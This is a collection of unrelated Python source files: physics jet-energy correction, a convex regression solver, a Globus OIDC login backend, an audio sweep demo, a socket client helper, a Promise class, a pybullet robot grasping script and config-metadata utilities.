sd=2,
jitter_sd=0.1,
max_jobs=400,
verbose=False,
make_predictions=True,
skip_complete=True,
results_dir='../srkl-results/stocks/',
iters=250,
base_kernels='SE,Per,Lin,Const,Noise',
random_seed=1,
period_heuristic=3,
max_period_heuristic=5,
period_heuristic_type='min',
subset=True,
subset_size=250,
full_iters=10,
bundle_size=5,
additive_form=False,
mean='ff.MeanZero()',
kernel='ff.NoiseKernel()',
lik='ff.LikGauss(sf=-np.Inf)',
score='bic',
search_operators=[('A', ('+', 'A', 'B'), {'A': 'kernel', 'B': 'base'}),
('A', ('*', 'A', 'B'), {'A': 'kernel', 'B': 'base-not-const'}),
('A', ('*-const', 'A', 'B'), {'A': 'kernel', 'B': 'base-not-const'}),
('A', 'B', {'A': 'kernel', 'B': 'base'}),
('A', ('CP', 'd', 'A'), {'A': 'kernel', 'd' : 'dimension'}),
#('A', ('PCP1', 'd', 'A'), {'A': 'kernel', 'd' : 'dimension'}),
#('A', ('PCP2', 'd', 'A'), {'A': 'kernel', 'd' : 'dimension'}),
('A', ('CW', 'd', 'A'), {'A': 'kernel', 'd' : 'dimension'}),
('A', ('PCW', 'd', 'A'), {'A': 'kernel', 'd' : 'dimension'}),
# ('A', ('B', 'd', 'A'), {'A': 'kernel', 'd' : 'dimension'}),
# ('A', ('BL', 'd', 'A'), {'A': 'kernel', 'd' : 'dimension'}),
# ('A', ('PB', 'd', 'A'), {'A': 'kernel', 'd' : 'dimension'}),
# ('A', ('PBP1', 'd', 'A'), {'A': 'kernel', 'd' : 'dimension'}),
# ('A', ('PBP2', 'd', 'A'), {'A': 'kernel', 'd' : 'dimension'}),
('A', ('None',), {'A': 'kernel'})]
)
|
import ROOT
import os, types
from math import *
from PhysicsTools.HeppyCore.utils.deltar import *
class JetReCalibrator:
def __init__(self,globalTag,jetFlavour,doResidualJECs,jecPath,upToLevel=3,
calculateSeparateCorrections=False,
calculateType1METCorrection=False, type1METParams={'jetPtThreshold':15., 'skipEMfractionThreshold':0.9, 'skipMuons':True} ):
"""Create a corrector object that reads the payloads from the text dumps of a global tag under
CMGTools/RootTools/data/jec (see the getJec.py there to make the dumps).
It will apply the L1,L2,L3 and possibly the residual corrections to the jets.
If configured to do so, it will also compute the type1 MET corrections."""
self.globalTag = globalTag
self.jetFlavour = jetFlavour
self.doResidualJECs = doResidualJECs
self.jecPath = jecPath
self.upToLevel = upToLevel
self.calculateType1METCorr = calculateType1METCorrection
self.type1METParams = type1METParams
# Make base corrections
path = os.path.expandvars(jecPath) #"%s/src/CMGTools/RootTools/data/jec" % os.environ['CMSSW_BASE'];
self.L1JetPar = ROOT.JetCorrectorParameters("%s/%s_L1FastJet_%s.txt" % (path,globalTag,jetFlavour),"");
self.L2JetPar = ROOT.JetCorrectorParameters("%s/%s_L2Relative_%s.txt" % (path,globalTag,jetFlavour),"");
self.L3JetPar = ROOT.JetCorrectorParameters("%s/%s_L3Absolute_%s.txt" % (path,globalTag,jetFlavour),"");
self.vPar = ROOT.vector(ROOT.JetCorrectorParameters)()
self.vPar.push_back(self.L1JetPar);
if upToLevel >= 2: self.vPar.push_back(self.L2JetPar);
if upToLevel >= 3: self.vPar.push_back(self.L3JetPar);
# Add residuals if needed
if doResidualJECs :
self.ResJetPar = ROOT.JetCorrectorParameters("%s/%s_L2L3Residual_%s.txt" % (path,globalTag,jetFlavour))
self.vPar.push_back(self.ResJetPar);
#Step3 (Construct a FactorizedJetCorrector object)
self.JetCorrector = ROOT.FactorizedJetCorrector(self.vPar)
if os.path.exists("%s/%s_Uncertainty_%s.txt" % (path,globalTag,jetFlavour)):
self.JetUncertainty = ROOT.JetCorrectionUncertainty("%s/%s_Uncertainty_%s.txt" % (path,globalTag,jetFlavour));
elif os.path.exists("%s/Uncertainty_FAKE.txt" % path):
self.JetUncertainty = ROOT.JetCorrectionUncertainty("%s/Uncertainty_FAKE.txt" % path);
else:
print 'Missing JEC uncertainty file "%s/%s_Uncertainty_%s.txt", so jet energy uncertainties will not be available' % (path,globalTag,jetFlavour)
self.JetUncertainty = None
self.separateJetCorrectors = {}
if calculateSeparateCorrections or calculateType1METCorrection:
self.vParL1 = ROOT.vector(ROOT.JetCorrectorParameters)()
self.vParL1.push_back(self.L1JetPar)
self.separateJetCorrectors["L1"] = ROOT.FactorizedJetCorrector(self.vParL1)
if upToLevel >= 2 and calculateSeparateCorrections:
self.vParL2 = ROOT.vector(ROOT.JetCorrectorParameters)()
for i in [self.L1JetPar,self.L2JetPar]: self.vParL2.push_back(i)
self.separateJetCorrectors["L1L2"] = ROOT.FactorizedJetCorrector(self.vParL2)
if upToLevel >= 3 and calculateSeparateCorrections:
self.vParL3 = ROOT.vector(ROOT.JetCorrectorParameters)()
for i in [self.L1JetPar,self.L2JetPar,self.L3JetPar]: self.vParL3.push_back(i)
self.separateJetCorrectors["L1L2L3"] = ROOT.FactorizedJetCorrector(self.vParL3)
if doResidualJECs and calculateSeparateCorrections:
self.vParL3Res = ROOT.vector(ROOT.JetCorrectorParameters)()
for i in [self.L1JetPar,self.L2JetPar,self.L3JetPar,self.ResJetPar]: self.vParL3Res.push_back(i)
self.separateJetCorrectors["L1L2L3Res"] = ROOT.FactorizedJetCorrector(self.vParL3Res)
def getCorrection(self,jet,rho,delta=0,corrector=None):
if not corrector: corrector = self.JetCorrector
if corrector != self.JetCorrector and delta!=0: raise RuntimeError('Configuration not supported')
corrector.setJetEta(jet.eta)
corrector.setJetPt(jet.pt*(1.-jet.rawFactor))
corrector.setJetA(jet.area)
corrector.setRho(rho)
corr = corrector.getCorrection()
if delta != 0:
if not self.JetUncertainty: raise RuntimeError("Jet energy scale uncertainty shifts requested, but not available")
self.JetUncertainty.setJetEta(jet.eta())
self.JetUncertainty.setJetPt(corr * jet.pt() * jet.rawFactor())
try:
jet.jetEnergyCorrUncertainty = self.JetUncertainty.getUncertainty(True)
except RuntimeError as r:
print "Caught %s when getting uncertainty for jet of pt %.1f, eta %.2f\n" % (r,corr * jet.pt() * jet.rawFactor(),jet.eta())
jet.jetEnergyCorrUncertainty = 0.5
#print " jet with corr pt %6.2f has an uncertainty %.2f " % (jet.pt()*jet.rawFactor()*corr, jet.jetEnergyCorrUncertainty)
corr *= max(0, 1+delta*jet.jetEnergyCorrUncertainty)
return corr
def correct(self,jet,rho,delta=0,addCorr=False,addShifts=False, metShift=[0,0]):
"""Corrects a jet energy (optionally shifting it also by delta times the JEC uncertainty)
If addCorr, set jet.corr to the correction.
If addShifts, set also the +1 and -1 jet shifts
The metShift vector will accumulate the x and y changes to the MET from the JEC, i.e. the
negative difference between the new and old jet momentum, for jets eligible for type1 MET
corrections, and after subtracting muons. The pt cut is applied to the new corrected pt.
This shift can be applied on top of the *OLD TYPE1 MET*, but only if there was no change
in the L1 corrections nor in the definition of the type1 MET (e.g. jet pt cuts).
"""
raw = 1.-jet.rawFactor
corr = self.getCorrection(jet,rho,delta)
if corr <= 0:
return jet.pt
newpt = jet.pt*raw*corr
return newpt
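# Hedged construction sketch (not part of the original module): the corrector
# reads text dumps named "<globalTag>_L1FastJet_<jetFlavour>.txt" (and L2/L3,
# optionally L2L3Residual) under jecPath. The tag, flavour and path below are
# placeholders, and 'jet'/'rho' are assumed to come from the caller's event loop.
#
# recalib = JetReCalibrator("MyGlobalTag_MC", "AK4PFchs", doResidualJECs=False,
#                           jecPath="/path/to/jec/text/dumps")
# corrected_pt = recalib.correct(jet, rho)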
|
import cvxpy as cp
import numpy as np
import torch
def cvxLP(X, Y, xn):
# solve min gamma
# s.t. |x_i theta - y_i | <= gamma
# <=> -gamma <= x_i theta - y_i <= gamma
# <=> x_i theta - gamma <= y_i
# -x_i theta - gamma <= -y_i
X = X.numpy()
Y = Y.numpy()
n = X.shape[0]
dim = X.shape[1]
XX = np.concatenate((X, -X), 0)
YY = np.concatenate((Y, -Y), 0).squeeze(1)
#set up LP
theta = cp.Variable(dim+1)
XX = np.concatenate((XX, -np.ones((2*n,1))), axis=1)
c = np.zeros((dim+1,1))
c[-1] = 1.0
prob = cp.Problem(cp.Minimize(c.T @ theta),
[XX @ theta <= YY])
prob.solve()
theta = theta.value
gamma = theta[-1]
theta = theta[0:-1]
r = np.matmul(X, theta.reshape(dim,1)) - Y
r = abs(r).squeeze()
Midx = np.argsort(r)[-(dim+1):]
# Solutions
M = Midx[0:dim+1]
d = np.max(r)
#convert to torch
theta = torch.tensor(theta, dtype = torch.float64).view(-1, 1)
d = torch.tensor(d, dtype = torch.float64)
M = torch.tensor(M, dtype = torch.int64).view(1, -1)
return theta, d, M
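# Hedged usage sketch (not part of the original module): fits the minimax
# (Chebyshev) regression above on synthetic data. All *_demo names are
# illustrative, and None is passed for 'xn' since it appears unused in this
# version of cvxLP.
if __name__ == "__main__":
    torch.manual_seed(0)
    X_demo = torch.randn(50, 3, dtype=torch.float64)
    true_theta = torch.tensor([[1.0], [-2.0], [0.5]], dtype=torch.float64)
    Y_demo = X_demo @ true_theta + 0.01 * torch.randn(50, 1, dtype=torch.float64)
    theta_hat, gamma, support = cvxLP(X_demo, Y_demo, xn=None)
    print("estimated theta:", theta_hat.squeeze().tolist())
    print("worst-case residual gamma:", float(gamma))
    print("indices of the largest residuals:", support.squeeze().tolist())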
|
"""
Globus Auth OpenID Connect backend, docs at:
https://docs.globus.org/api/auth
"""
import logging
from social_core.backends.globus import (
GlobusOpenIdConnect as GlobusOpenIdConnectBase
)
from social_core.exceptions import AuthForbidden
from globus_portal_framework.gclients import (
get_service_url, GROUPS_SCOPE, GLOBUS_GROUPS_V2_MY_GROUPS
)
log = logging.getLogger(__name__)
class GlobusOpenIdConnect(GlobusOpenIdConnectBase):
OIDC_ENDPOINT = get_service_url('auth')
GLOBUS_APP_URL = 'https://app.globus.org'
# Fixed by https://github.com/python-social-auth/social-core/pull/577
JWT_ALGORITHMS = ['RS512']
def introspect_token(self, auth_token):
return self.get_json(
self.OIDC_ENDPOINT + '/v2/oauth2/token/introspect',
method='POST',
data={"token": auth_token,
"include": "session_info,identities_set"},
auth=self.get_key_and_secret()
)
def get_globus_identities(self, auth_token, identities_set):
return self.get_json(
self.OIDC_ENDPOINT + '/v2/api/identities',
method='GET',
headers={'Authorization': 'Bearer ' + auth_token},
params={'ids': ','.join(identities_set),
'include': 'identity_provider'},
)
def get_user_details(self, response):
# If SOCIAL_AUTH_GLOBUS_SESSIONS is not set, fall back to default
if not self.setting('SESSIONS'):
return super(GlobusOpenIdConnectBase, self).get_user_details(
response)
auth_token = response.get('access_token')
introspection = self.introspect_token(auth_token)
identities_set = introspection.get('identities_set')
# Find the latest authentication
ids = introspection.get('session_info').get('authentications').items()
identity_id = None
idp_id = None
auth_time = 0
for auth_key, auth_info in ids:
at = auth_info.get('auth_time')
if at > auth_time:
identity_id = auth_key
idp_id = auth_info.get('idp')
auth_time = at
# Get user identities
user_identities = self.get_globus_identities(auth_token, identities_set)
for item in user_identities.get('identities'):
if item.get('id') == identity_id:
fullname, first_name, last_name = self.get_user_names(
item.get('name'))
return {
'username': item.get('username'),
'email': item.get('email'),
'fullname': fullname,
'first_name': first_name,
'last_name': last_name,
'identity_id': identity_id,
'idp_id': idp_id,
'identities': user_identities
}
return None
def get_user_id(self, details, response):
if not self.setting('SESSIONS'):
return super(GlobusOpenIdConnect, self).get_user_id(details,
response)
return details.get('idp_id') + '_' + details.get('identity_id')
def auth_allowed(self, response, details):
if not self.setting('SESSIONS'):
return super(GlobusOpenIdConnect, self).auth_allowed(response,
details)
allowed_groups = [g['uuid']
for g in self.setting('ALLOWED_GROUPS', [])]
if not allowed_groups:
log.info('settings.SOCIAL_AUTH_GLOBUS_ALLOWED_GROUPS is not '
'set, all users are allowed.')
return True
identity_id = details.get('identity_id')
username = details.get('username')
user_groups = self.get_user_globus_groups(response.get('other_tokens'))
# Fetch all groups where the user is a member.
allowed_user_groups = [group for group in user_groups
if group['id'] in allowed_groups]
allowed_user_member_groups = []
for group in allowed_user_groups:
gname, gid = group.get('name'), group['id']
for membership in group['my_memberships']:
if identity_id == membership['identity_id']:
log.info('User {} ({}) granted access via group {} ({})'
.format(username, identity_id, gname, gid))
return True
else:
allowed_user_member_groups.append(membership)
log.debug('User {} ({}) is not a member of any allowed groups. '
'However, they may be able to login with {}'.format(
username, identity_id, allowed_user_member_groups)
)
raise AuthForbidden(
self, {'allowed_user_member_groups': allowed_user_member_groups}
)
def get_user_globus_groups(self, other_tokens):
"""
Given the 'other_tokens' key provided by user details, fetch all
        groups a user belongs to. The API is PUBLIC, and no special allowlists
are needed to use it.
"""
groups_token = None
for item in other_tokens:
if item.get('scope') == GROUPS_SCOPE:
groups_token = item.get('access_token')
if groups_token is None:
raise ValueError(
'You must set the {} scope on {} in order to set an allowed '
'group'.format(GROUPS_SCOPE,
'settings.SOCIAL_AUTH_GLOBUS_SCOPE')
)
# Get the allowed group
return self.get_json(
'{}{}'.format(get_service_url('groups'),
GLOBUS_GROUPS_V2_MY_GROUPS),
method='GET',
headers={'Authorization': 'Bearer ' + groups_token}
)
def auth_params(self, state=None):
params = super(GlobusOpenIdConnect, self).auth_params(state)
# If Globus sessions are enabled, force Globus login, and specify a
# required identity if already known
if not self.setting('SESSIONS'):
return params
params['prompt'] = 'login'
session_message = self.strategy.session_pop('session_message')
if session_message:
params['session_message'] = session_message
params['session_required_identities'] = self.strategy.session_pop(
'session_required_identities')
return params
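# Hedged configuration sketch (not part of this module): auth_allowed() above
# reads the backend settings SOCIAL_AUTH_GLOBUS_SESSIONS and
# SOCIAL_AUTH_GLOBUS_ALLOWED_GROUPS, the latter as a list of dicts carrying a
# 'uuid' key. The UUID below is a placeholder, not a real Globus group.
#
# SOCIAL_AUTH_GLOBUS_SESSIONS = True
# SOCIAL_AUTH_GLOBUS_ALLOWED_GROUPS = [
#     {'uuid': '00000000-0000-0000-0000-000000000000'},
# ]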
|
# SweepGen2x.py
#
# A DEMO Audio Sweep Generator from 4KHz down to 100Hz and back up again
# using standard Text Mode Python. Another kids level piece of simple, FREE,
# Test Gear project code...
# This working idea is copyright, (C)2010, B.Walker, G0LCU.
# Written in such a way that anyone can understand how it works.
#
# Tested on PCLinuxOS 2009 and Debian 6.0.0 using Python 2.6.2, 2.6.6 and 2.7.2.
# It may well work on much earlier versions of Python but it is untested...
# "/dev/dsp" IS required for this to work; therefore if you haven't got it then
# install "oss-compat" from you distro's repository. Ensure the sound system is
# not already in use.
# It is easily possible to lengthen the higher frequency playing times and VERY
# easily alter the output level and to speed up or slow down the sweep speed.
# I'll let the big guns do that for you...
# IMPORTANT NOTE:- Every EVEN number of characters is a symmetrical "square" wave
# BUT every ODD number of characters has preference for the "space" by one character.
#
# To run this DEMO type at the Python prompt......
#
# >>> execfile("/full/path/to/SweepGen2x.py")<RETURN/ENTER>
#
# ......and away you go.
#
# Note:- NO import[s] required at all, good eh! ;o)
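# Added note (not in the original): the tone frequency is set by the length of
# the repeated mark/space string - roughly 8000 / len(freq) Hz at the default
# 8KHz sample rate, so 2 characters give about 4KHz and 80 characters give 100Hz.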
def main():
# Set all "variables" as globals, my choice... ;o)
global mark
global space
global freq
global stringlength
global n
global sweep
# Allocate initial values.
mark="\xff"
space="\x00"
freq=mark+space
# 8KHz is the default sample speed of the sound system.
# Therefore this sets the lowest frequency, 8KHz/80=100Hz...
stringlength=80
n=0
sweep=0
# A simple screen clear and user screen for a default Python window...
for n in range(0,40,1):
print "\r\n"
print "Sweep Generator DEMO from 4KHz down to 100HZ and back again...\n"
print "This just gives 5 SIREN like sweeps but it is enough for this DEMO...\n"
print "Copyright, (C)2010, B.Walker, G0LCU.\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n"
# Open the audio device, "/dev/dsp" for writing.
audio=open("/dev/dsp", "wb")
# Sweep for five times only for this DEMO...
while sweep<=4:
freq=mark+space
stringlength=80
n=0
while 1:
# Sweep down from 4KHz to 100Hz.
# Add a trailing 0x00 character.
audio.write(freq)
freq=freq+space
# Quit when length of "freq" string is 80 characters.
if len(freq)>=stringlength: break
audio.write(freq)
# Add a leading 0xff character.
freq=mark+freq
# Quit when length of "freq" string is 80 characters.
if len(freq)>=stringlength: break
while 1:
# Sweep back up again from 100Hz to 4KHz.
# Start with an empty string.
freq=""
# Now create a new square wave string.
for n in range(0,int((stringlength)/2),1):
freq=freq+mark
for n in range(0,int((stringlength)/2),1):
freq=freq+space
audio.write(freq)
# Create a new string reduced by one character.
# This removes one 0xff character.
stringlength=stringlength-1
# Quit when length of "freq" string is 2 characters.
if len(freq)<=2: break
# Start with an empty string.
freq=""
# Now create a new string reduced by one character.
for n in range(0,int((stringlength)/2),1):
freq=freq+mark
for n in range(0,int(((stringlength)/2)+1),1):
freq=freq+space
audio.write(freq)
# This removes one 0x00 character.
stringlength=stringlength-1
# Quit when length of "freq" string is 2 characters.
if len(freq)<=2: break
sweep=sweep+1
# Ensure a complete exit from the loop.
if sweep>=5: break
# On exit ensure the audio device is closed.
audio.close()
main()
# End of SweepGen2x.py DEMO...
# Enjoy finding simple solutions to often VERY difficult problems... ;o)
|
import socket
import telnetlib
import time
from typing import Optional
from termcolor import colored
from cool.util import b2s
from .tube import Tube
class Remote(Tube):
"""Class for connecting to a remote server.
:param host: host name of the server
:param port: port number of the server
:param timeout: timeout in seconds
"""
def __init__(self, host: str, port: int, timeout: Optional[int] = None) -> None:
self.host = host
self.port = port
self.timeout = timeout
self.conn = socket.create_connection((self.host, self.port))
def close(self) -> None:
"""Close the connection.
"""
self.conn.close()
def interact(self) -> None:
"""Launch the interactive shell to the server.
"""
t = telnetlib.Telnet()
# "Telnet" HAS "sock" ATTRIBUTE!!
t.sock = self.conn # type: ignore
        # Telnet.interact() calls text.decode("ascii"), which can fail on non-ASCII bytes.
        # We print the raw bytes ourselves to avoid UnicodeDecodeError.
while True:
try:
time.sleep(0.5)
inp = b2s(t.read_very_eager())
print(inp)
out = input(colored(">> ", "green"))
t.write(out.encode("utf8") + b"\n")
except (EOFError, BrokenPipeError):
break
def recv(self, numb: int = 4096, timeout: Optional[int] = None) -> bytes:
"""Receive data from the server.
:param numb: maximum data size to receive
:param timeout: timeout in seconds
:return: received data
"""
self.__settimeout(timeout)
try:
data = self.conn.recv(numb)
except socket.timeout:
raise TimeoutError
return data
def send(self, data: bytes, timeout: Optional[int] = None) -> None:
"""Send data to the server.
:param data: data to send
:param timeout: timeout in seconds
"""
self.__settimeout(timeout)
try:
self.conn.sendall(data)
except socket.timeout:
raise TimeoutError
def __settimeout(self, timeout: Optional[int] = None) -> None:
if timeout is None:
self.conn.settimeout(self.timeout)
else:
self.conn.settimeout(timeout)
def remote(host: str, port: int, timeout: Optional[int] = None) -> Remote:
"""Create a remote connection the server.
:param host: host name of the server
:param port: port number of the server
:param timeout: timeout in seconds
"""
return Remote(host, port, timeout=timeout)
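# Hedged usage sketch (not part of the original module): host and port below
# are placeholders for a service you actually control.
#
# conn = remote("127.0.0.1", 9999, timeout=5)
# conn.send(b"hello\n")
# print(conn.recv(1024))
# conn.close()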
|
__author__ = 'faner'
def check_callable(target):
if not (target and callable(target)):
raise TypeError('target is not callable!')
class PromiseRunner(object):
def __init__(self, promiseObj, run):
self._promiseObj = promiseObj
from threading import Thread
def _run_wrap():
try:
self._result = run()
self._promiseObj.do_then()
except Exception, e:
self._promiseObj.do_fail()
self._runner = Thread(target=_run_wrap)
self._runner.start()
class Promise(object):
def __init__(self, call):
pr = self._pr = PromiseRunner(self, call)
self._result = None
self._success = True
self._completed = False
@property
def completed(self):
return self._completed
@property
def result(self):
return self._result
@property
def success(self):
return self._success
def do_then(self):
self._result = self._success_callback()
self._success, self._completed = True, True
def do_fail(self):
self._result = self._fail_callback()
self._success, self._completed = False, True
def then(self, success_callback):
check_callable(success_callback)
self._success_callback = success_callback
return self
def fail(self, fail_callback):
check_callable(fail_callback)
self._fail_callback = fail_callback
return self
def PromiseWrapper(target, *args, **kwargs):
return Promise(lambda: target(*args, **kwargs))
def promise_decorator(target):
def _func(*args, **kwargs):
return Promise(lambda: target(*args, **kwargs))
return _func
|
import argparse
import pickle
import os
import sys
from pdb import set_trace as bp
import numpy as np
import torch
#import gym
import my_pybullet_envs
import pybullet as p
import time
from a2c_ppo_acktr.envs import VecPyTorch, make_vec_envs
from a2c_ppo_acktr.utils import get_render_func, get_vec_normalize
import inspect
from NLP_module import NLPmod
from my_pybullet_envs.inmoov_arm_obj_imaginary_sessions import ImaginaryArmObjSession ,URDFWriter
from my_pybullet_envs.inmoov_shadow_place_env_v3 import InmoovShadowHandPlaceEnvV3
currentdir = os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe())))
homedir = os.path.expanduser("~")
# TODO: main module depends on the following code/model:
# demo env: especially observation
# the settings of inmoov hand v2
# obj sizes & frame representation
# constants
DEMO_ENV_NAME = 'ShadowHandDemoBulletEnv-v1'
GRASP_PI = '0114_cyl_s_1'
GRASP_DIR = "./trained_models_%s/ppo/" % GRASP_PI
GRASP_PI_ENV_NAME = 'InmoovHandGraspBulletEnv-v1'
PLACE_PI = '0114_cyl_s_1_place_v3_2'
PLACE_DIR = "./trained_models_%s/ppo/" % PLACE_PI
PLACE_PI_ENV_NAME = 'InmoovHandPlaceBulletEnv-v3'
STATE_NORM = True
OBJ_MU = 1.0
FLOOR_MU = 1.0
# HAND_MU = 3.0
sys.path.append('a2c_ppo_acktr')
parser = argparse.ArgumentParser(description='RL')
parser.add_argument('--seed', type=int, default=1)
parser.add_argument('--non-det', type=int, default=0)
args = parser.parse_args()
args.det = not args.non_det
IS_CUDA = True
DEVICE = 'cuda' if IS_CUDA else 'cpu'
TS = 1./240
TABLE_OFFSET = [0.25, 0.1, 0.0] # TODO: changed to 0.2 for vision, 0.25 may collide, need to change OR reaching.
HALF_OBJ_HEIGHT_L = 0.09
HALF_OBJ_HEIGHT_S = 0.07 # todo: 0.065 now
PLACE_CLEARANCE = 0.16
# test only one obj
g_tx = 0.2
g_ty = 0.3
p_tx = 0.1
p_ty = -0.1
p_tz = 0.0 # TODO: depending on placing on floor or not
def get_relative_state_for_reset(oid):
obj_pos, obj_quat = p.getBasePositionAndOrientation(oid) # w2o
hand_pos, hand_quat = env_core.robot.get_link_pos_quat(env_core.robot.ee_id) # w2p
inv_h_p, inv_h_q = p.invertTransform(hand_pos, hand_quat) # p2w
o_p_hf, o_q_hf = p.multiplyTransforms(inv_h_p, inv_h_q, obj_pos, obj_quat) # p2w*w2o
fin_q, _ = env_core.robot.get_q_dq(env_core.robot.all_findofs)
state = {'obj_pos_in_palm': o_p_hf, 'obj_quat_in_palm': o_q_hf,
'all_fin_q': fin_q, 'fin_tar_q': env_core.robot.tar_fin_q}
return state
def load_policy_params(dir, env_name, iter=None):
if iter is not None:
path = os.path.join(dir, env_name + "_" + str(iter) + ".pt")
else:
path = os.path.join(dir, env_name + ".pt")
if IS_CUDA:
actor_critic, ob_rms = torch.load(path)
else:
actor_critic, ob_rms = torch.load(path, map_location='cpu')
vec_norm = get_vec_normalize(env)
if not STATE_NORM: assert ob_rms is None
if vec_norm is not None:
vec_norm.eval()
vec_norm.ob_rms = ob_rms
recurrent_hidden_states = torch.zeros(1, actor_critic.recurrent_hidden_state_size)
masks = torch.zeros(1, 1)
return actor_critic, ob_rms, recurrent_hidden_states, masks # probably only first one is used
# set up world
p.connect(p.GUI)
p.resetSimulation()
p.setTimeStep(TS)
p.setGravity(0, 0, -10)
env = make_vec_envs(
DEMO_ENV_NAME,
args.seed,
1,
None,
None,
device=DEVICE,
allow_early_resets=False)
env_core = env.venv.venv.envs[0].env.env
# env.reset() # TODO: do we need to call reset After loading the objects?
# env_core.robot.change_hand_friction(HAND_MU)
oid1 = p.loadURDF(os.path.join(currentdir, 'my_pybullet_envs/assets/cylinder_small.urdf'), [g_tx, g_ty, HALF_OBJ_HEIGHT_S+0.001],
useFixedBase=0)
p.changeDynamics(oid1, -1, lateralFriction=OBJ_MU)
table_id = p.loadURDF(os.path.join(currentdir, 'my_pybullet_envs/assets/tabletop.urdf'), TABLE_OFFSET,
useFixedBase=1)
p.changeDynamics(table_id, -1, lateralFriction=FLOOR_MU)
# ready to grasp
sess = ImaginaryArmObjSession()
Qreach = np.array(sess.get_most_comfortable_q_and_refangle(g_tx, g_ty)[0])
env_core.robot.reset_with_certain_arm_q(Qreach)
env_core.assign_estimated_obj_pos(g_tx, g_ty) # env_core.tx = will not work
g_actor_critic, g_ob_rms, recurrent_hidden_states, masks = load_policy_params(GRASP_DIR, GRASP_PI_ENV_NAME) # latter 2 returns dummy
# g_obs = torch.Tensor([env_core.getExtendedObservation()])
# print(g_obs)
g_obs = env.reset()
print("gobs", g_obs)
if IS_CUDA:
g_obs = g_obs.cuda()
input("ready to grasp")
# grasp!
control_steps = 0
for i in range(95):
with torch.no_grad():
value, action, _, recurrent_hidden_states = g_actor_critic.act(
g_obs, recurrent_hidden_states, masks, deterministic=args.det)
# print(g_obs)
# print(action)
# input("press enter")
g_obs, reward, done, _ = env.step(action)
print(g_obs)
print(action)
print(control_steps)
control_steps += 1
# input("press enter g_obs")
masks.fill_(0.0 if done else 1.0)
# if control_steps >= 100: # done grasping
# for _ in range(1000):
# p.stepSimulation()
# time.sleep(ts)
# masks.fill_(0.0 if done else 1.0)
state = get_relative_state_for_reset(oid1)
print("after grasping", state)
p.disconnect()
p.connect(p.GUI)
env = make_vec_envs(
DEMO_ENV_NAME,
args.seed,
1,
None,
None,
device=DEVICE,
allow_early_resets=False)
env_core = env.venv.venv.envs[0].env.env
desired_obj_pos = [p_tx, p_ty, PLACE_CLEARANCE + p_tz]
a = InmoovShadowHandPlaceEnvV3(renders=False, is_box=False, is_small=True, place_floor=True, grasp_pi_name='0114_cyl_s_1')
arm_q =a.get_optimal_init_arm_q(desired_obj_pos)
print("place arm q", arm_q)
o_pos_pf = state['obj_pos_in_palm']
o_quat_pf = state['obj_quat_in_palm']
all_fin_q_init = state['all_fin_q']
tar_fin_q_init = state['fin_tar_q']
env_core.robot.reset_with_certain_arm_q_finger_states(arm_q, all_fin_q_init, tar_fin_q_init)
p_pos, p_quat = env_core.robot.get_link_pos_quat(env_core.robot.ee_id)
o_pos, o_quat = p.multiplyTransforms(p_pos, p_quat, o_pos_pf, o_quat_pf)
table_id = p.loadURDF(os.path.join(currentdir, 'my_pybullet_envs/assets/tabletop.urdf'), TABLE_OFFSET,
useFixedBase=1)
p.changeDynamics(table_id, -1, lateralFriction=FLOOR_MU)
oid1 = p.loadURDF(os.path.join(currentdir, 'my_pybullet_envs/assets/cylinder_small.urdf'), o_pos, o_quat,
useFixedBase=0)
p.changeDynamics(oid1, -1, lateralFriction=OBJ_MU)
state = get_relative_state_for_reset(oid1)
print("before releasing", state)
print(env_core.withVel)
p_actor_critic, p_ob_rms, recurrent_hidden_states, masks = load_policy_params(PLACE_DIR, PLACE_PI_ENV_NAME) # latter 2 returns dummy
p_obs = env.reset()
print("pobs", p_obs)
if IS_CUDA:
p_obs = p_obs.cuda()
input("ready to place")
# place!
control_steps = 0
for i in range(95):
with torch.no_grad():
value, action, _, recurrent_hidden_states = p_actor_critic.act(
p_obs, recurrent_hidden_states, masks, deterministic=args.det)
# print(g_obs)
p_obs, reward, done, _ = env.step(action)
# print(action)
# print(g_obs)
# input("press enter g_obs")
masks.fill_(0.0 if done else 1.0)
# g_obs = torch.Tensor([env_core.getExtendedObservation(withVel=True)])
control_steps += 1
# if control_steps >= 100: # done grasping
# for _ in range(1000):
# p.stepSimulation()
# time.sleep(ts)
# masks.fill_(0.0 if done else 1.0)
|
import json
import logging
import math
import numbers
import os
import platform
import resource
import sys
from collections import MutableMapping
from contextlib import contextmanager
from IPython.core.display import display, HTML
from pyhocon import ConfigFactory
from pyhocon import ConfigMissingException
from pyhocon import ConfigTree
from pyhocon import HOCONConverter
from gtd.utils import NestedDict, Config
def in_ipython():
try:
__IPYTHON__
return True
except NameError:
return False
def print_with_fonts(tokens, sizes, colors, background=None):
def style(text, size=12, color='black'):
return u'<span style="font-size: {}px; color: {};">{}</span>'.format(size, color, text)
styled = [style(token, size, color) for token, size, color in zip(tokens, sizes, colors)]
text = u' '.join(styled)
if background:
text = u'<span style="background-color: {};">{}</span>'.format(background, text)
display(HTML(text))
def gb_used():
used = resource.getrusage(resource.RUSAGE_SELF).ru_maxrss
if platform.system() != 'Darwin':
# on Linux, used is in terms of kilobytes
power = 2
else:
# on Mac, used is in terms of bytes
power = 3
return float(used) / math.pow(1024, power)
class Metadata(MutableMapping):
"""A wrapper around ConfigTree.
Supports a name_scope contextmanager.
"""
def __init__(self, config_tree=None):
if config_tree is None:
config_tree = ConfigTree()
self._config_tree = config_tree
self._namestack = []
@contextmanager
def name_scope(self, name):
self._namestack.append(name)
yield
self._namestack.pop()
def _full_key(self, key):
return '.'.join(self._namestack + [key])
def __getitem__(self, key):
try:
val = self._config_tree.get(self._full_key(key))
except ConfigMissingException:
raise KeyError(key)
if isinstance(val, ConfigTree):
return Metadata(val)
return val
def __setitem__(self, key, value):
"""Put a value (key is a dot-separated name)."""
self._config_tree.put(self._full_key(key), value)
def __delitem__(self, key):
raise NotImplementedError()
def __iter__(self):
return iter(self._config_tree)
def __len__(self):
return len(self._config_tree)
def __repr__(self):
return self.to_str()
def to_str(self):
return HOCONConverter.convert(self._config_tree, 'hocon')
def to_file(self, path):
with open(path, 'w') as f:
f.write(self.to_str())
@classmethod
def from_file(cls, path):
config_tree = ConfigFactory.parse_file(path)
return cls(config_tree)
class SyncedMetadata(Metadata):
"""A Metadata object which writes to file after every change."""
def __init__(self, path):
if os.path.exists(path):
m = Metadata.from_file(path)
else:
m = Metadata()
super(SyncedMetadata, self).__init__(m._config_tree)
self._path = path
def __setitem__(self, key, value):
super(SyncedMetadata, self).__setitem__(key, value)
self.to_file(self._path)
def print_list(l):
